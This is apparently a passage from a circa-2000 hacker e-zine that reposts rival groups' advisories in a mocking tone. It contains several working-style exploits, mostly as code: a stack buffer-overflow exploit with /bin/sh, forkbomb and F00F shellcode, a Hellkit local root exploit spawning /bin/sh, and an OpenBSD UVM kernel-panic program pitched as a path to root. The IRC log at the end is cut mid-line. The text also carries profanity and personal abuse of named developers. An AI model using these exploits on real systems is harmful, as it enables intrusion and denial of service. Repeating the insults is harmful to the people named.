+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | p1c | + + | | + + | | + + | | + + | | + + | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ [END_CUT] skel [END_DIR] lt ___________________________ .-' `-. [05]| a w4lk d0wn mem0ry l4me |[05] [05]| by: |[05] [05]| Team Sploit |[05] `-.___________________________.-' The reason we are reposting this is because, well, we are fed the hell up at lamers biting our style. Here we include the original shellgen.c and shellgen advisory + exploit. Then, we include the lame ass attempt to bite TeamSploit's style by Scrippie and Team b0f. They wrote a lame as hell exploit for the wonderful hellkit. FUCK OFF LAMERS. [BEGIN_DIR] shellgen [CUT_HERE] shellgen.c /* shellcode generator by Mixter PRIVATE - DO NOT DISTRIBUTE! */ char *welk= "\x20\x20\x20\x20\x20\x20\x20\x2f\x5c\x0a\x20\x20\x20\x20\x20\x20\x7b\x2e" "\x2d\x7d\x0a\x20\x20\x20\x20\x20\x3b\x5f\x2e\x2d\x27\x5c\x0a\x20\x20\x20" "\x20\x7b\x20\x20\x20\x20\x5f\x2e\x7d\x5f\x0a\x20\x20\x20\x20\x20\x5c\x2e" "\x2d\x27\x20\x2f\x20\x20\x60\x2c\x0a\x20\x20\x20\x20\x20\x20\x5c\x20\x20" "\x7c\x20\x20\x20\x20\x2f\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x7c\x20" "\x20\x2c\x2f\x0a\x20\x20\x20\x20\x6a\x67\x73\x20\x5c\x7c\x5f\x2f\x0a"; char *ark= "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5f\x2e\x2d\x2d\x2d\x2e\x5f" "\x0a\x20\x20\x20\x20\x20\x20\x20\x2e\x27\x22\x22\x2e\x27\x2f\x7c\x5c\x60" "\x2e\x22\x22\x27\x2e\x0a\x20\x20\x20\x20\x20\x20\x3a\x20\x20\x2e\x27\x20" "\x2f\x20\x7c\x20\x5c\x20\x60\x2e\x20\x20\x3a\x0a\x20\x20\x20\x20\x20\x20" "\x27\x2e\x27\x20\x20\x2f\x20\x20\x7c\x20\x20\x5c\x20\x20\x60\x2e\x27\x0a" "\x20\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x2f\x20\x20\x20\x7c\x20\x20\x20" "\x5c\x20\x2e\x27\x0a\x20\x20\x20\x20\x6a\x67\x73\x20\x20\x60\x2d\x2e\x5f" "\x5f\x7c\x5f\x5f\x2e\x2d\x27\x0a"; char *clam= "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5f\x2e\x2d\x2d\x2d\x2e\x5f" "\x0a\x20\x20\x20\x20\x20\x20\x20\x2e\x3a\x22\x3a\x5f\x27\x2d\x2e\x2d\x60" "\x5f\x3a\x22\x3a\x2e\x0a\x20\x20\x20\x20\x20\x20\x3a\x60\x2e\x60\x2e\x5f" "\x27\x2d\x2e\x2d\x27\x5f\x2e\x27\x2e\x27\x3a\x0a\x20\x20\x20\x20\x20\x20" "\x27\x60\x2e\x60\x2e\x5f\x60\x2d\x2e\x2d\x27\x5f\x2e\x27\x2e\x27\x27\x0a" "\x20\x20\x20\x20\x20\x20\x20\x60\x2e\x60\x2d\x2e\x60\x2d\x2e\x2d\x27\x2e" "\x2d\x27\x2e\x27\x0a\x20\x20\x20\x20\x6a\x67\x73\x20\x20\x60\x2e\x5f\x60" "\x2d\x2e\x2d\x27\x5f\x2e\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x60\x27\x27\x27\x60\x0a"; char *scallop= "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5f\x2e\x2d\x27\x27\x7c\x27" "\x27\x2d\x2e\x5f\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x2e\x2d\x27\x20\x20" "\x20\x20\x20\x7c\x20\x20\x20\x20\x20\x60\x2d\x2e\x0a\x20\x20\x20\x20\x20" "\x20\x2e\x27\x5c\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x20\x20" "\x20\x2f\x60\x2e\x0a\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x5c\x20\x20\x20" "\x20\x20\x20\x7c\x20\x20\x20\x20\x20\x20\x2f\x20\x20\x20\x60\x2e\x0a\x20" "\x20\x20\x20\x5c\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x20\x20\x7c\x20\x20" "\x20\x20\x20\x2f\x20\x20\x20\x20\x20\x2f\x0a\x20\x20\x20\x20\x20\x60\x5c" "\x20\x20\x20\x20\x5c\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x2f\x20\x20\x20" "\x20\x2f\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x60\x5c\x20\x20\x20\x5c\x20" "\x20\x20\x7c\x20\x20\x20\x2f\x20\x20\x20\x2f\x27\x0a\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x60\x5c\x20\x20\x5c\x20\x20\x7c\x20\x20\x2f\x20\x20\x2f" "\x27\x0a\x20\x20\x20\x6a\x67\x73\x20\x20\x5f\x2e\x2d\x60\x5c\x20\x5c\x20" "\x7c\x20\x2f\x20\x2f\x27\x2d\x2e\x5f\x0a\x20\x20\x20\x20\x20\x20\x20\x7b" "\x5f\x5f\x5f\x5f\x5f\x60\x5c\x5c\x7c\x2f\x2f\x27\x5f\x5f\x5f\x5f\x5f\x7d"; void main() { char buf[1024]; printf("Generate shell code for: (solaris/linux/bsd/win32)? "); gets(buf); printf("Generating shell code...\n"); if(strstr(buf,"solaris")) puts(welk); if(strstr(buf,"linux")) puts(ark); if(strstr(buf,"bsd")) puts(clam); if(strstr(buf,"win32")) puts(scallop); printf("done!\n"); } [END_CUT] shellgen.c [CUT_HERE] shellgen.c.adv [TeamSploit Advisory] [Begin PDP-11 SIGNED MESSAGE] TeamSploit labs : http://el8.n3.net Also check out our Security E-ZINE at http://el8.n3.net Hello folks, this is TeamSploit (TM), we have noticed an overflow in shellgen.c . Shellgen.c is an advanced shellcode generator, which is widely used by the 'hacking-community'. Shellgen.c can be found at 1337.tsx.org (Mixter Security *sigh*) Problem: Shellgen.c uses gets (which is very unsafe, so i've heard) ('ld: gets() is unsafe' errors!) A malicious user may obtain SUPER_USER [1] privledges by using the appended exploit. This is a multiplatform vulnerability. If shellgen.c is run setuid root, a user may obtain root privledges thus compromising a system. Example: TSlabs$ ./shellgen Generate shell code for: (solaris/linux/bsd/win32)? 1million i's Segmentation Fault, core dumped. TSlabs$ rm shellgen ; reboot Possible fixes: Use the patch provided by TSlabs (TM). Thurly remove shellgen.c and shellgen binaries from system. TSlabs$ find / -name shellgen.c DO NOT RUN SETUID ROOT! Rewrite libc. [1] SUPERUSER - GOD ACCESS - UID 0 - CAN RM -RF / This has been a TeamSploit advisory, much respect due to: gH (global hell), PERSUiT, f0rpaxe, Team HAckphreak ( and hackphreak labs ), w00w00, ADM, !r00t, b4b0, www.antionline.com, www.deathrowrecords.com. [Appended actual program, possible patch.diff, and exploit] PROGRAM: /* shellcode generator by Mixter PRIVATE - DO NOT DISTRIBUTE! */ char *welk= "\x20\x20\x20\x20\x20\x20\x20\x2f\x5c\x0a\x20\x20\x20\x20\x20\x20\x7b\x2e" "\x2d\x7d\x0a\x20\x20\x20\x20\x20\x3b\x5f\x2e\x2d\x27\x5c\x0a\x20\x20\x20" "\x20\x7b\x20\x20\x20\x20\x5f\x2e\x7d\x5f\x0a\x20\x20\x20\x20\x20\x5c\x2e" "\x2d\x27\x20\x2f\x20\x20\x60\x2c\x0a\x20\x20\x20\x20\x20\x20\x5c\x20\x20" "\x7c\x20\x20\x20\x20\x2f\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x7c\x20" "\x20\x2c\x2f\x0a\x20\x20\x20\x20\x6a\x67\x73\x20\x5c\x7c\x5f\x2f\x0a"; char *ark= "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5f\x2e\x2d\x2d\x2d\x2e\x5f" "\x0a\x20\x20\x20\x20\x20\x20\x20\x2e\x27\x22\x22\x2e\x27\x2f\x7c\x5c\x60" "\x2e\x22\x22\x27\x2e\x0a\x20\x20\x20\x20\x20\x20\x3a\x20\x20\x2e\x27\x20" "\x2f\x20\x7c\x20\x5c\x20\x60\x2e\x20\x20\x3a\x0a\x20\x20\x20\x20\x20\x20" "\x27\x2e\x27\x20\x20\x2f\x20\x20\x7c\x20\x20\x5c\x20\x20\x60\x2e\x27\x0a" "\x20\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x2f\x20\x20\x20\x7c\x20\x20\x20" "\x5c\x20\x2e\x27\x0a\x20\x20\x20\x20\x6a\x67\x73\x20\x20\x60\x2d\x2e\x5f" "\x5f\x7c\x5f\x5f\x2e\x2d\x27\x0a"; char *clam= "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5f\x2e\x2d\x2d\x2d\x2e\x5f" "\x0a\x20\x20\x20\x20\x20\x20\x20\x2e\x3a\x22\x3a\x5f\x27\x2d\x2e\x2d\x60" "\x5f\x3a\x22\x3a\x2e\x0a\x20\x20\x20\x20\x20\x20\x3a\x60\x2e\x60\x2e\x5f" "\x27\x2d\x2e\x2d\x27\x5f\x2e\x27\x2e\x27\x3a\x0a\x20\x20\x20\x20\x20\x20" "\x27\x60\x2e\x60\x2e\x5f\x60\x2d\x2e\x2d\x27\x5f\x2e\x27\x2e\x27\x27\x0a" "\x20\x20\x20\x20\x20\x20\x20\x60\x2e\x60\x2d\x2e\x60\x2d\x2e\x2d\x27\x2e" "\x2d\x27\x2e\x27\x0a\x20\x20\x20\x20\x6a\x67\x73\x20\x20\x60\x2e\x5f\x60" "\x2d\x2e\x2d\x27\x5f\x2e\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x60\x27\x27\x27\x60\x0a"; char *scallop= "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5f\x2e\x2d\x27\x27\x7c\x27" "\x27\x2d\x2e\x5f\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x2e\x2d\x27\x20\x20" "\x20\x20\x20\x7c\x20\x20\x20\x20\x20\x60\x2d\x2e\x0a\x20\x20\x20\x20\x20" "\x20\x2e\x27\x5c\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x20\x20" "\x20\x2f\x60\x2e\x0a\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x5c\x20\x20\x20" "\x20\x20\x20\x7c\x20\x20\x20\x20\x20\x20\x2f\x20\x20\x20\x60\x2e\x0a\x20" "\x20\x20\x20\x5c\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x20\x20\x7c\x20\x20" "\x20\x20\x20\x2f\x20\x20\x20\x20\x20\x2f\x0a\x20\x20\x20\x20\x20\x60\x5c" "\x20\x20\x20\x20\x5c\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x2f\x20\x20\x20" "\x20\x2f\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x60\x5c\x20\x20\x20\x5c\x20" "\x20\x20\x7c\x20\x20\x20\x2f\x20\x20\x20\x2f\x27\x0a\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x60\x5c\x20\x20\x5c\x20\x20\x7c\x20\x20\x2f\x20\x20\x2f" "\x27\x0a\x20\x20\x20\x6a\x67\x73\x20\x20\x5f\x2e\x2d\x60\x5c\x20\x5c\x20" "\x7c\x20\x2f\x20\x2f\x27\x2d\x2e\x5f\x0a\x20\x20\x20\x20\x20\x20\x20\x7b" "\x5f\x5f\x5f\x5f\x5f\x60\x5c\x5c\x7c\x2f\x2f\x27\x5f\x5f\x5f\x5f\x5f\x7d"; void main() { char buf[1024]; printf("Generate shell code for: (solaris/linux/bsd/win32)? "); gets(buf); printf("Generating shell code...\n"); if(strstr(buf,"solaris")) puts(welk); if(strstr(buf,"linux")) puts(ark); if(strstr(buf,"bsd")) puts(clam); if(strstr(buf,"win32")) puts(scallop); printf("done!\n"); } PATCH: TSlabs$ cat TeamSploit_shellgen.c.diff --- shellgen.c Wed Dec 29 22:00:28 1999 +++ new.c Wed Dec 29 23:05:09 1999 @@ -54,7 +54,7 @@ { char buf[1024]; printf("Generate shell code for: (solaris/linux/bsd/win32)? "); -gets(buf); +fgets(buf,80,stdin); printf("Generating shell code...\n"); if(strstr(buf,"solaris")) puts(welk); if(strstr(buf,"linux")) puts(ark); TSlabs$ EXPLOIT: --`cut here`-- /* * * * This is a TeamSploit production * exploit for shellgen.c ( please read the advisory attatched ) * ./shellgen_exp ... * TeamSploit labs : http://el8.n3.net * * */ #include <stdio.h> #define THE_OFFSET_IS 256 #define THE_BUFFER_IS 1024 #define LEEWAY 8 unsigned char f00f_shellcode[] = { 0xF0, 0x0F }; unsigned char forkbomb_shellcode[] = { 0xb0, 0x02, 0xcd, 0x80, 0xeb, 0xfa }; unsigned char generic_shellcode[] = { 0x41 }; unsigned char sh_shellcode[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; unsigned char ls_shellcode[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/ls"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void usage(void) { puts("./shellgen <shellcode_num> <program> <offset> (optional)"); puts("1 = f00f"); puts("2 = forkbomb"); puts("3 = generic"); puts("4 = shell"); puts("5 = ls"); exit(31337); } int main(int argc, char *argv[]) { FILE *m1xt3r; unsigned int c, offset; char *prognam, tuff[THE_BUFFER_IS + LEEWAY]; unsigned long addr; if (argc < 3) { usage(); } if (argc < 3) { usage(); } c = atoi(argv[1]); switch (c) { case 1: puts("F00F SHELLCODE CHOSEN"); break; case 2: puts("FORKBOMB SHELLCODE CHOSEN (PREMIUM CHOICE)"); break; case 3: puts("GENERIC SHELLCODE (provided by gH thnx)"); break; case 4: puts("RUN A SHELL (good for when shellgen is +s root)"); break; case 5: puts("LS SHELLCODE (INCASE LS IS BACKDOORED)"); break; default: usage(); } prognam = argv[2]; if (argc >= 4) offset = atoi(argv[3]); else offset = THE_OFFSET_IS; printf("ADDRESS = 0x%x, OFFSET = 0x%x\n", get_sp(), get_sp() + offset); if ((m1xt3r = popen(prognam, "w")) == NULL) { perror("p o p e n"); exit(0); } addr = get_sp(); if (c == 1) { /* f00f shellcode */ for (c = THE_BUFFER_IS; c < THE_BUFFER_IS + LEEWAY; c += 4) *(unsigned long *) (tuff + c) = addr + offset; memset(tuff, 0x90, THE_BUFFER_IS - strlen(f00f_shellcode)); memcpy(&tuff[THE_BUFFER_IS - strlen(f00f_shellcode)], f00f_shellcode, strlen(f00f_shellcode)); *(tuff + THE_BUFFER_IS + LEEWAY) = 0; } else if (c == 2) { for (c = THE_BUFFER_IS; c < THE_BUFFER_IS + LEEWAY; c += 4) *(unsigned long *) (tuff + c) = addr + offset; memset(tuff, 0x90, THE_BUFFER_IS - strlen(forkbomb_shellcode)); memcpy(&tuff[THE_BUFFER_IS - strlen(forkbomb_shellcode)], forkbomb_shellcode, strlen(forkbomb_shellcode)); *(tuff + THE_BUFFER_IS + LEEWAY) = 0; } else if (c == 3) { memset(tuff, generic_shellcode[0], sizeof(tuff)); } else if (c == 4) { for (c = THE_BUFFER_IS; c < THE_BUFFER_IS + LEEWAY; c += 4) *(unsigned long *) (tuff + c) = addr + offset; memset(tuff, 0x90, THE_BUFFER_IS - strlen(sh_shellcode)); memcpy(&tuff[THE_BUFFER_IS - strlen(sh_shellcode)], sh_shellcode, strlen(sh_shellcode)); *(tuff + THE_BUFFER_IS + LEEWAY) = 0; } else if (c == 5) { for (c = THE_BUFFER_IS; c < THE_BUFFER_IS + LEEWAY; c += 4) *(unsigned long *) (tuff + c) = addr + offset; memset(tuff, 0x90, THE_BUFFER_IS - strlen(ls_shellcode)); memcpy(&tuff[THE_BUFFER_IS - strlen(ls_shellcode)], ls_shellcode, strlen(ls_shellcode)); *(tuff + THE_BUFFER_IS + LEEWAY) = 0; } else usage(); puts("Get ready, we are about to exploit shellgen, hold on tight"); fprintf(m1xt3r, "%s", tuff); if (pclose(m1xt3r) < 0) { perror("pclose"); exit(-1); } return 0; } [END_CUT] shellgen.c.adv [CUT_HERE] hellex_LAMEASSFUCKS.c /* hellex.c - Hellkit 1.2 local linux (x86) exploit by Narrow */ /* Greetz: Legion2000, buffer0verflow and Scrippie (of courz) */ /* Tue May 23 14:04:35 2000 - It doesn't suck much memonry ;-)*/ #include <stdio.h> #include <string.h> #define OFFSETS -500 // Red Hat 6.0 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } int main(int argc,char **argv) { char buf[973]; int offset; if(argc < 2) { offset = OFFSETS; } else { offset = atoi(argv[1]); } memset(buf,0x90,sizeof(buf)); memcpy(buf + sizeof(buf) - strlen(shellcode) - 8, shellcode, strlen(shellcode )); *(long *)&buf[973 - 4] = get_sp() - offset; execl("./driver", "drank-driver", buf); } [END_CUT] hellex_LAMEASSFUCKS.c [END_DIR] shellgen _______________________ .-' `-. [06]| OpenBSD |[06] [06]| by: |[06] [06]| Team Hackphreak |[06] `-._______________________.-' Hello, it is Team Hackphreak again. Today, we will prove how incompetant and lame these OpenBSD retards really are. First, we start off with the original advisory which slammed into bugtraq and packetstorm. Then, we show you a funny email. Next, we will analyze some irc logs which prove the OpenBSD development team are total bafoons. Finally, we will leave you with traderism (aka SSG claiming no responsibility for the advisory). Note to self, my comments will be in *** OBSDCMNT. [BEGIN_DIR] OpenBSD [CUT_HERE] hp2.adv - HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % - | | | www.hackphreak.org | | | | Version : Hackphreak advisory #2 of many | | Author : RLoxley[hackphreak / condemnation / EHAP / RSH / ZSH (soon)]| | Contributed : All of Team Hackphreak (thanks alot) & SSG | | Topic : A non-privledged user may crash an OpenBSD Operating System,| | thus rendering the system useless. | | Effected : All Operating Systems which use UVM (not MACH VM) | | * OpenBSD | | * NetBSD | | Prvt Release : November 5th, 1998 | | Released : November 5th, 2000 | | Credits : www.hackphreak.org, zsh.interniq.org, www.subterrain.net | | Check Section 1 | | Vender status : Notified | | | - HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % - Section 1 [Greets]: First and foremost, thanks to team hackphreak and SSG, great job! SSG helped during the researching of the bug (bind, aempire, cripto). This was a coordinated effort with Team Hackphreak and The Hacker Collective known as SSG. I would like to thank RootShellHackers and Team ZSH for rigorously testing on many freenets :] (ratcorpse and her great mass testing scripts, great for analysis: www.sneakerz.org/~rat < great site :) I would like to thank caddis of TESO. He started the whole OpenBSD war. Keep up the good work. Special thanks to Mixter and his TFN2k. It has made my job much easier. I would also like to thank: EHAP, Condemnation, gov-boi (hack.co.za), shinex (yf0rce :), ISS, Solar Designer, #hackphreak, #darknet, #!/bin/zsh, #condemnation, #conf, Al Hugher, Aleph1, and my parents. Section 2 [Preface]: Usually Team HackPhreak keeps our code and research quite private until we give lectures in our channel on undernet (#hackphreak). But what really annoys us, is when a very big figure in the security community acts disrespectful to the people who help build this internet infastructure. This person who I speak of, is Theo de Raadt. Theo de Raadt claims that OpenBSD hasn't experienced a local root hole in the default install for many years. During his internal security audits, they find many bugs, yet they just hide them, patch them, and never notify the public. This is very unethical on the part of the OpenBSD team. I think you guys are lame. What worrys Team Hackphreak, is how many other bugs have gone unnoticed. We have found many other exlpoitable holes in previous OpenBSD distributions, that have miraculously been patched and never revealed. Next, there is the "Three years without a remote hole in the default install". I hope this advisory breaks that aswell, because, technically: * Log into the remote host * Grab our exploit * Crash the kernel This bug is also be exploitable via NFS. Three years without a remote hole? Strike that. Section 3 [Background]: UVM is a new virtual memory system developed which is currently used in the OpenBSD Operating Systems. It is significantly better than the traditional MACH based VM. Section 4 [Problem Description]: There exists a bug in the UVM code which has blatently slipped passed the seemlessly small minded OpenBSD security auditors. The bug exists in the anonymous mapping code in UVM. This bug allows for any local user (or remote user) to crash the entire OpenBSD system, rendering it completely useless. Once the system has crashed, a local user (with access to the terminal) may in fact hack the system. The system drops into DDB (man it). DDB allows for debugging of the actual kernel. When one has access to the kernel, they can do most anything: such as reading disk buffers, reading _copyright, reading network mbuf's. So this scales to a most incredible attack, not just a DoS (if you have read through this you have now more reason to switch to Linux). A very smart attacker will: * Crash the kernel * Assume the location of the box which crashed (@ the colo) * Use DDB to gain god status A layout of the crash dump is given: * trap() * uvm_fault() * uvmfault_amapcopy() * amap_copy() * amap_alloc() ------------------------------------------------------------------ struct vm_amap * amap_alloc(sz, padsz, waitf) vaddr_t sz, padsz; int waitf; /* * amap_alloc: allocate an amap to manage "sz" bytes of anonymous VM * * => caller should ensure sz is a multiple of PAGE_SIZE * => reference count to new amap is set to one * => new amap is returned unlocked */ { struct vm_amap *amap; int slots, padslots; UVMHIST_FUNC("amap_alloc"); UVMHIST_CALLED(maphist); AMAP_B2SLOT(slots, sz); /* load slots */ AMAP_B2SLOT(padslots, padsz); ------------------------------------------------------------------ The kernel crashes in the first instance of AMAP_B2SLOT(slots, sz). ------------------------------------------------------------------ #define AMAP_B2SLOT(S,B) { \ if ((B) & (PAGE_SIZE - 1)) \ panic("AMAP_B2SLOT: invalid byte count"); \ (S) = (B) >> PAGE_SHIFT; \ } ------------------------------------------------------------------ Basically, if the (sz & (PAGE_SIZE-1)) is true, the kernel panic()'s. Not so cool Mr. Theo, my grandmother wouldn't even have done something so stupid and all she has is an A+ and CCNA! As aempirei, bind, and cripto pointed out: Even if AMAP_B2SLOT() is patched, the bug will still exist, hence forth because later on down the yellow brick road, the kernel will crash in routines such as: * amap_splitref() * amap_lookup() So a hacker will still be able to obtain root access. No thanks to obecian for notifying Theo a wee bit early. Section 4 [The exploit]: // PUBLIC RELEASE // // krnl-DoS.c by RLoxley of Team Hackphreak (#hackphreak on unet) & SSG // // This exploit is proof of concept code. It exploits the UVM bug in // all OpenBSD kernels. It can also be used to gain god access via // ddb during the crash recovery phase of OpenBSD's security structure. // // Greets: #hackphreak, RootShellHackers, ZSH (#!/bin/zsh), EHAP, // Condemnation, caddis[TESO], Solar Designer, gov-boi, // #darknet, ISS, #conf, Al Hugher, Aleph1, shinex (for porting) // SSG, www.subterrain.net // // PS: The exploit is broke very slightly, so this takes some knowledge ;) // // PUBLIC RELEASE #include <stdio.h> #include <errno.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <a.out.h> #include <fcntl.h> #include <sys/types.h> #define CRASH_FILE "./f0rKb0mB" extern int errno; int main(int argc, char *argv[]) { struct exec *ehdr; struct stat statbuf; int fd; unsigned char *data; fd = open(argv[0], O_RDONLY); if (fd < 0) { perror("main() : open(argv[0]) "); exit(-1); } if (fstat(fd, &statbuf) < 0) { perror("main() : fstat() "); exit(-1); } data = (unsigned char *) malloc(statbuf.st_size); if (data == NULL) { perror("main() : malloc() "); exit(-1); } if (read(fd, data, statbuf.st_size) <= 0) { puts("main() : read() Failure"); exit(-1); } ehdr = (struct exec *) data; close(fd); unlink(CRASH_FILE); fd = open(CRASH_FILE, O_RDWR | O_CREAT, S_IXUSR); if (fd < 0) { perror("main() : open(CRASH_FILE) "); exit(-1); } ehdr->a_data += 3; if (write(fd, data, statbuf.st_size) < 0) { perror("main() : write() "); exit(-1); } close(fd); if (execlp(CRASH_FILE, NULL) < 0) { perror("main() : execlp() "); exit(-1); } return (0); } Section 5 [TO HELL WITH YOU'S]: Theo de Raadt and the OpenBSD Team Paedophiles Rascists All of #kkk on undernet All of the people who disturb my channel BoW frys / prophet b0g Scriptkiddies all over the place obecian Section 6 [Come 1 Come ALL]: Team Hackphreak invites you to undernet #hackphreak for a great learning experience. Just join us to teach and learn. But remember, HARASSMENT = BAN. www.hackphreak.org/newbie. Section 7 [Lies]: I hope this advisory brings you closer to NT / Linux, rather than OpenBSD. Linux & NT are way better anyway. [END_CUT] hp2.adv [CUT_HERE] funny_eMale From: "Condemned.org" <rloxley@condemned.org> To: "John Kerbawy" <john@maKintosh.com> References: <20001105173302.A27901@maKintosh.com> Subject: Re: webpage. Date: Sun, 5 Nov 2000 19:24:20 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 not sure what you are thinking, but that is PERFECT grammer. RL ----- Original Message ----- From: "John Kerbawy" <john@maKintosh.com> To: <rloxley@hackphreak.org> Sent: Sunday, November 05, 2000 6:33 PM Subject: webpage. > Someone is missing grammar clue. > > ---- http://www.hackphreak.org/rules/ ---- > > 4: NO ADVERTISING IN THE CHANNEL OR IT'S TITLE BAR. > ^^^^ > > No advertising in the channel or it is title bar? > > oops. > > __ > John Kerbawy <john@maKintosh.com> > [END_CUT] funny_eMale [CUT_HERE] irclogs \xf9\xed\xf9 Starting logfile IrcLog \xf9\xed\xf9 Topic (#openbsd): http://www.OpenBSD.org \xf9\xed\xf9 Topic (#openbsd): set by john at Sat Nov 4 19:06:39 2000 \xf9\xed\xf9 [Users(#openbsd:63)] [ ~el8 ] [ opcode ] [ influx_ ] [ carica ] [ Intrinsic ] [ niekze ] [ slipdisc ] [ kahl ] [@obecian ] [ pdo ] [ sizaym ] [ GoatBoy ] [ cell ] [@toor ] [@jeremie ] [ binfalse ] [@Ambrose ] [ [rew] ] [ desti ] [ mollusk ] [@dhartmei ] [ motorola- ] [ bn- ] [ loxariz ] [ _preD ] [ StJohn ] [ gk ] [@Figz ] [ nj ] [ marc ] [@hydro__ ] [@ActivatE ] [ joe- ] [ danp ] [@fx ] [ ~el8 ] [ phidias ] [ Setzer ] [ bugoid ] [@uux- ] [ tibim ] [ J0hnBlaze ] [ Slower ] [ sariel ] [@john ] [ genecyst ] [ mogambo ] [ rwxr--r-- ] [ majidf ] [ jwit ] [ GreyFoxx ] [ TAiNiUM ] [@SmooveB ] [ [frank] ] [ jethro ] [ ratcorpse ] [ cazz ] [ kajar ] [ malte__ ] [ ar ] [ Creamore ] [ _mojo ] [@spuug ] [ rys ] \xf9\xed\xf9 [Users(#openbsd:0)] \xf9\xed\xf9 ~el8 [~el8@~el8.com] has joined #openbsd <rys:#openbsd> m3th: no clue.. running current? <m3th:#openbsd> 2.7 yes <rys:#openbsd> 2.7 stable or openbsd-current? \xf9\xed\xf9 SignOff m3th: #OpenBSD (Read error 73: Connection reset by peer) \xf9\xed\xf9 m3th [meth@bofh.bestweb.net] has joined #openbsd <m3th:#openbsd> let me find a similar system, see if i can find the file \xf9\xed\xf9 ^BBitchX^B: You are now talking to channel #Openbsd \xf9\xed\xf9 ~el8 [~el8@~el8.net] has joined #openbsd <~el8> Hello, I was wondering if there is a patch for the local root exploit for OpenBSD (the one on packetstorm) ? And is it remote ? \xf9\xed\xf9 laggn [operand@1Cust5.tnt2.roanoke.va.da.uu.net] has joined #openbsd <~el8> It says 'Vendor notified' <~el8> And I don't see any vendor patches.. <laggn> when i go to the ftp mirrors and cd 2.8 there are no install files..is there an ftp that i can go to that has the 2.8 install files? [cell_X(blah@38.195.196.53)] just strip off the suid bit <rys> ~el8: hold on | rys (rys@supernal.godsey.net) (Internic Network) \xb3 ircname : Joe | channels : #openbsd #Icons_of_Vanity \xb3 server : irc.west.gblx.net (Global Crossing West Client Server) | away : rys - gone : idle : 0 hours 0 mins 10 secs (signon: Sun Nov 5 11:54:14 2000) <DesertFox> hi all <dhartmei> ~el8: which one? libutil was fixed long ago. <DesertFox> rys: there aren't any. <cell_X> ~el8 are you talking about the /usr/bin/chpass issue..do chmod u-s /usr/bin/chpass <DesertFox> rys: i'm running 2.8 and i got it out of the snapshots dir <~el8> Nope <~el82> i see an advisory on the front page of packetstorm <laggn> rys : yes, i see it there :) <~el8> ~el82, yes, that is what I speak of <~el8> I don't quite understand it, to tell you the truth <cell_X> grr..wrong answer.. <cell_X> =) <dhartmei> ~el82: url? <~el82> packetstorm.securify.com <~el83> theo is gay <~el83> theo is gay <~el83> theo is gay <rys> yes he is but this channel is about openbsd not theo <rys> just kidding \xf9\xed\xf9 ~el83 [~el83@~el83.net] has left #openbsd [] <~el82> i dunnno \xf9\xed\xf9 SignOff Brandon`: #Phrack () \xf9\xed\xf9 mode/#openbsd [+b *!*@*.eurocompton.net] by dhartmei <rys> uh <dhartmei> ~el82: where do you see obsd mentioned there? link to the specific article? <DesertFox> from what i hear, theo's somewhat crabby. <rys> http://packetstorm.securify.com/0011-exploits/hp2.adv <spuug> theo is not gay. <rys> theo is somewhat crabby <rys> bit my head off like 1 1/2 years ago <~el82> dhart: rys pasted | dhartmei (~dhartmei@cable-ggar48-183.intergga.ch) (Switzerland) \xb3 ircname : Daniel Hartmeier <daniel@benzedrine.cx> | channels : @#openbsd #compsci @#unixhelp #atheism @#C++ @#c/c++ @#cryptonomicon @#informatik \xb3 server : irc.light.se (It's alive, it's 